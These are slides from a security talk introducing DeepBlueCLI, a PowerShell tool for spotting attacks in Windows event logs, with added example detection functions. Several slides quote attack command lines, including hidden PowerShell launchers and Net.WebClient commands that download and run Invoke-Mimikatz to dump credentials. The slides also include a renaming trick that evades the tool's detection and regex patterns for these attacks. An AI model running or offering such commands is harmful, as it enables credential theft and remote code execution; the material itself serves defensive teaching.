


Introducing DeepBlueCLI: a PowerShell Module for Hunt Teaming via Windows Event Logs

Eric Conrad (GSE #13)


• A copy of this talk is available at http://ericconrad.com
• Includes a link to the DeepBlueCLI GitHub site
o https://github.com/sans-blue-
o Plus sample evtx files for all major events discussed

Introducing DeepBlueCLI 2
Sunlight is the Best Disinfectant – Louis Brandeis

• Malware and exploit frameworks have been evolving faster than common preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$
• Blocking 16-character service names containing only upper- and lower-case alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response
Introducing DeepBlueCLI 3
The Evolution of Windows Malware Payloads

Malware and exploit frameworks often copy an exe to the filesystem
• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this
Newer malware and exploitation frameworks are migrating to PowerShell for post-exploitation
• They avoid using .ps1 files, and load the code via (very long) command lines, or use the PowerShell WebClient.DownloadString method
• Metasploit exploit target PowerShell uses a long, compressed and base64-encoded PowerShell function loaded via cmd.exe

Introducing DeepBlueCLI 4
Metasploit Meterpreter Payload via Command Line
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object
(New-Object IO.StreamReader(New-Object

Introducing DeepBlueCLI 5

• Command is > 2400 bytes
• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip-compressed and Base64-encoded PowerShell
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function

Introducing DeepBlueCLI 6
Obfuscated PowerShell Function (after base64 -d and gzip -d)

Introducing DeepBlueCLI 7
Payload via Net.WebClient

Executing PowerSploit's Invoke-Mimikatz.ps1 via
• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX
Invoke-Mimikatz -DumpCreds"

Same method via short URL:
• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX
(New-Object Net.WebClient).DownloadString('http://eic.me/17');
Invoke-Mimikatz -DumpCreds"
• Note that 'ps1' is not included in the command line

Introducing DeepBlueCLI 8
Advantages to these Methods

• Antivirus will allow cmd.exe and powershell.exe to execute
• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and powershell.exe will be whitelisted
• Restricting execution of ps1 files via Set-ExecutionPolicy settings has no effect
o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, yesterday
• There is no logging of process command lines or PowerShell commands by default (hold that thought)
• Preventive and detective controls tend to allow and ignore these methods

Introducing DeepBlueCLI 9
Windows 7

• Windows 10 offers a wealth of security features
o Upgrade if you can
• This talk will focus on detecting malicious events on Windows 7
o Windows 7 offers a "sweet spot" for clients
• All recommendations can be achieved with Windows 7, free Microsoft downloads, plus DeepBlueCLI
o All of these events (and more) can also be detected on Windows 8+

Introducing DeepBlueCLI 10
Log Full Command Line of all Processes

• Windows 7+ now supports logging the full command line of all launched processes natively
• Turn this on!
• Run gpedit.msc and set:
o Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\Detailed Tracking
o Computer Configuration\Administrative Templates\System\Audit Process Creation
• Then monitor:
o PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

Introducing DeepBlueCLI 11
Security Event 4688

• Security event 4688 is the highest-value Windows event, IMO
o It can be used to reliably detect most modern post-exploitation techniques
• There is one caveat: passwords may be disclosed via this event

Introducing DeepBlueCLI 12
Command Lines to Look For

Once full command lines are logged, search for the following:
• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64-encoded commands
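The checks above, applied to Security event 4688, as an added example (this is not DeepBlueCLI's own code). It assumes command-line logging is enabled as described on the previous slides, so each 4688 event carries a CommandLine field; the whitelist entry is the GoogleUpdate example from later in this talk, and the `-EvtxPath` parameter is a hypothetical option for scanning a saved evtx file.

```powershell
function Find-SuspiciousProcessCreation {
    param([string]$EvtxPath)   # optional: analyze a saved Security .evtx instead of the live log
    $filter = @{ LogName = 'Security'; ID = 4688 }
    if ($EvtxPath) { $filter = @{ Path = $EvtxPath; ID = 4688 } }

    # Benign commands known to produce giant command lines (whitelist, regex per entry)
    $whitelist = @('^"C:\\Program Files\\Google\\Update\\GoogleUpdate\.exe" /ping')

    # Regex -> reason, mirroring the "command lines to look for" list
    $suspicious = @{
        '\\csc\.exe'                        = 'C# compiler (csc.exe)'
        '\\cvtres\.exe'                     = 'cvtres.exe (Resource File To COFF converter)'
        '\\(rundll32|cscript)\.exe'         = 'rundll32.exe / cscript.exe'
        '\.vbs\b'                           = '.vbs script'
        '(^|\s|\\)(schtasks|at)(\.exe)?\s'  = 'schtasks / at'
        '\\Temp\\'                          = 'launched from a temp folder'
        'cmd\.exe.*powershell'              = 'PowerShell launched via cmd.exe'
        '(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}' = 'base64-encoded command'
    }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # 4688 fields are <Data Name="..."> elements under EventData in the event XML
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $cmd = $data['CommandLine']
        if (-not $cmd) { return }                                    # command-line auditing is off
        if ($whitelist | Where-Object { $cmd -match $_ }) { return } # known-benign giant command

        $reasons = @()
        if ($cmd.Length -ge 1000) { $reasons += "long command line ($($cmd.Length) chars)" }
        foreach ($p in $suspicious.Keys) { if ($cmd -imatch $p) { $reasons += $suspicious[$p] } }

        if ($reasons) {
            New-Object PSObject -Property @{
                Time    = $_.TimeCreated
                Process = $data['NewProcessName']
                Reasons = $reasons -join '; '
                Command = $cmd
            }
        }
    }
}

Find-SuspiciousProcessCreation | Format-List
```

Run it in an elevated PowerShell (reading the Security log requires administrative rights); each reported object lists every reason the command line tripped, so one Metasploit-style launch shows up as long, cmd.exe-to-PowerShell and base64 at once.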
Introducing DeepBlueCLI 13
PowerShell Logging

PowerShell 4.0 (default on Windows 8.1) includes additional logging
• Easy Windows 7 SP1 install
• Event 4103 (Module Logging) is very helpful
• DeepBlueCLI analyzes this

PowerShell 5.0 (default on Windows 10) adds more logging
• Can be installed on Windows 7 SP1, takes multiple steps
• PowerShell v5 works on Windows 7 SP1, but…
o It's easy to break PowerShell logging
Introducing DeepBlueCLI 14

• Microsoft's EMET (Enhanced Mitigation Experience Toolkit) is a tool that hardens Windows operating systems against a series of common exploit
o Free download from Microsoft
• Can be used to harden any version of Windows from XP and 2003 through Windows 10 and Server 2012
o Older EMET versions are helpful for helping protect legacy operating systems such as Windows XP and Windows Server 2003 (both end of life)
• In my testing: Windows 7 becomes a much harder target once EMET is
• "One thing I can recommend is anti-exploitation features. Microsoft EMET: everybody ought to be turning that on" – Rob Joyce, NSA
Introducing DeepBlueCLI 15

Detect when EMET blocks malware:
• PS> Get-WinEvent -FilterHashtable @{LogName="application"; ProviderName="EMET"; id=2}

Introducing DeepBlueCLI 16
Introducing DeepBlueCLI – Beta 0.1

• Announcing the public release of DeepBlueCLI beta 0.1
• 100% PowerShell, runs on PowerShell 2.0 (Windows 7 default) or higher
o Can process PowerShell 4.0/5.0 event logs
• Can automatically detect all examples discussed
o And more
• Processes local event logs, or evtx files

Introducing DeepBlueCLI 17
The Genesis of DeepBlueCLI

• Logging new process creation: easy
PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}
• Logging processes launched with long command lines, or commands that match certain malicious patterns: requires scripting
• Telling clients "just write a script" usually results in blank stares
o My keen powers of inference tell me that SOC scripters are rare
o OK, let me write the script…
Introducing DeepBlueCLI 18
The Script

• How hard could it be?
o Famous last words as you confidently submit a DerbyCon CFP
• Some event data is well-formed and easily parsed XML
• Other event data (*cough*, EMET, *cough*) is a blob of text
o Fortunately, PowerShell has strong regex support
• In the end, each event requires custom code to:
o Detect malice
o Generate concise, actionable output

Introducing DeepBlueCLI 19
DeepBlueCLI – Design Notes

• Focus is on quality, not quantity
o All killer, no filler
o Not "shovel events into/out of a tool"
• Each reported event type has a specific malicious use case to support it
• Initial tool focus is on high-quality, actionable events, and the underlying logic to detect them
• Output is currently basic text, but designed to be actionable
o Plan to add CSV, XML and PowerShell object output modes in the future

Introducing DeepBlueCLI 20
Dodging DeepBlueCLI

• Many of the techniques used by DeepBlueCLI can be evaded
o DeepBlueCLI identifies commands containing 'mimikatz'
o Dodge by renaming 'mimikatz' to 'mimidogz'
• Dodging all of the techniques is difficult
o Long command lines
o Use of Net.WebClient
o base64-encoded functions
o Compressed functions
• Many IT professionals commit the perfect solution fallacy

Introducing DeepBlueCLI 21
Beware of the Perfect Attacker Fallacy

Paraphrasing collective feedback from my change-resistant clients:
• Well, APT will certainly use zero-day exploits to bypass patching, and also bypass EMET without triggering any EMET logs, and inject malware into RAM to avoid whitelisting, and create realistic-looking registry run keys to maintain persistence, and phone home quite infrequently via Facebook to evade command-and-control detection, and use perfect user-agents, and…

To quote Grace Hopper:
• The most damaging phrase in the language is "We've always done it this way!"
• Humans are allergic to change. They love to say, "We've always done it this way." I try to fight that. That's why I have a clock on my wall that runs counter-clockwise.

Introducing DeepBlueCLI 22
DeepBlueCLI: Current List of Detected Events

• Long command lines
• Long PowerShell commands
• Regex matching PowerShell and CL
• Base64-encoded CL or PowerShell
• Compressed/Base64-encoded CL or PowerShell
• PowerShell Net.WebClient
• EMET blocks
• AppLocker blocks
• Suspicious service creation
• Service errors
• User creation
• Users added to Local/Global Admin group
• High number of logon failures

Introducing DeepBlueCLI 23
DeepBlueCLI: Regex Matching Command Lines

Regular expression matching of PowerShell and command lines via a simple CSV file

Introducing DeepBlueCLI 24
DeepBlueCLI - Whitelist

Some benign commands create giant command lines, for example:

"C:\Program Files\Google\Update\GoogleUpdate.exe" /ping

DeepBlueCLI supports a whitelist to ignore these commands

Introducing DeepBlueCLI 25
DeepBlue CLI: Base64 and/or Compressed Commands

• DeepBlueCLI attempts to automatically detect base64-encoded commands
o And automatically decode them
• If the commands are also compressed (Metasploit-style) it will also uncompress them
• In both cases: it will then scan the normalized command for malicious regular expression matches

Introducing DeepBlueCLI 26
Use Case: DeepBlueCLI vs. SMB Password Guessing

This Metasploit SMB password guessing attack generates 3561 security event logs

DeepBlueCLI creates one entry
• Design goal: summarize, don't DoS
Introducing DeepBlueCLI 27
Use Case: PowerShell Empire (thx @harmj0y and @enigma0x3)

• PowerShell Empire is quite
• By default: zero Windows events are generated by the launcher.bat payload on the
• Once enabled: security event 4688 is quite helpful

Introducing DeepBlueCLI 28
DeepBlueCLI vs. PowerShell Empire


Introducing DeepBlueCLI 29
Use Case: Metasploit psexec

Exploit target: Native


Introducing DeepBlueCLI 30
Meterpreter getsystem

Attacker then escalated privileges and dumped the hashes:

Introducing DeepBlueCLI 31
DeepBlueCLI vs. Metasploit psexec with Native upload

Detection of Metasploit-style service name and Native upload EXE:

DeepBlueCLI also detects use of Meterpreter's "getsystem":
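The service-creation check for both psexec targets (the 16-letter random service name from slide 3 and the cmd.exe-to-PowerShell base64 loader used by the PowerShell target), as an added example that is not DeepBlueCLI's own code. It assumes System log event 7045 ("a service was installed") with its ServiceName, ImagePath and AccountName fields; `-EvtxPath` is a hypothetical option for scanning a saved evtx file.

```powershell
function Find-SuspiciousServiceInstall {
    param([string]$EvtxPath)   # optional: saved System .evtx instead of the live log
    $filter = @{ LogName = 'System'; ID = 7045 }
    if ($EvtxPath) { $filter = @{ Path = $EvtxPath; ID = 7045 } }

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # 7045 EventData carries ServiceName, ImagePath, ServiceType, StartType, AccountName
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $name = [string]$data['ServiceName']
        $path = [string]$data['ImagePath']

        $reasons = @()
        # Metasploit default: exactly 16 upper/lower-case letters (case-sensitive match)
        if ($name -cmatch '^[A-Za-z]{16}$') { $reasons += 'Metasploit-style 16-letter service name' }
        # PowerShell target: cmd.exe (or %COMSPEC%) starts a hidden powershell with a base64 loader
        if ($path -imatch '(cmd\.exe|%COMSPEC%).*powershell') { $reasons += 'PowerShell launched via cmd.exe as a service' }
        if ($path -imatch 'FromBase64String|-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}') { $reasons += 'base64 payload in image path' }
        if ($path.Length -ge 1000) { $reasons += "long image path ($($path.Length) chars)" }

        if ($reasons) {
            New-Object PSObject -Property @{
                Time    = $_.TimeCreated
                Service = $name
                Account = $data['AccountName']
                Reasons = $reasons -join '; '
                Image   = $path
            }
        }
    }
}

Find-SuspiciousServiceInstall | Format-List
```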

Introducing DeepBlueCLI 32
Use Case: Metasploit psexec, exploit target PowerShell

Introducing DeepBlueCLI 33
DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, system log

Introducing DeepBlueCLI 34
DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, security log

Introducing DeepBlueCLI 35
Use Case: PowerSploit (thx @mattifestation, @obscuresec and

Introducing DeepBlueCLI 36
DeepBlueCLI vs PowerSploit

First command used the short URL, second used PowerSploit's GitHub site

Introducing DeepBlueCLI 37
Use Case: PSAttack (thx @jaredhaight)

PSAttack "…doesn't rely on powershell.exe. Instead it calls powershell directly through the .NET framework. This makes it harder for enterprises to block."
• https://github.com/jaredhaight

Introducing DeepBlueCLI 38
DeepBlueCLI vs. PSAttack

DeepBlueCLI detects PSAttack's use of csc.exe (C# Compiler) and cvtres.exe (Resource File To COFF Object Conversion Utility)

Introducing DeepBlueCLI 39
Use Case: Invoke-Obfuscation (thx @danielhbohannon)

Introducing DeepBlueCLI 40
DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow:
• In the meantime, I noticed it used a lot of special characters,
o Specifically the "+" to join the obfuscated strings together
• So I updated DeepBlueCLI
• And I created a POC "exploit"…
Introducing DeepBlueCLI 41
DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow. In the meantime, I created a POC

Introducing DeepBlueCLI 42
DeepBlueCLI: Next Steps

• Next major update will split DeepBlueCLI into two parts:
• Detection engine:
o Outputting to XML or PowerShell object format
• Reporting engine:
o Inputs results from the detection engine
o Outputs text, XML or CSV
• Also plans to integrate into SOF-ELK

Introducing DeepBlueCLI 43
Demo Time!

Introducing DeepBlueCLI 44
Thank you!

• Contact me on Twitter:
o @eric_conrad
• Copy of this talk is available at http://ericconrad.com
• Check out Security 511 for more monitoring/operational goodness: http://sec511.com

Introducing DeepBlueCLI 45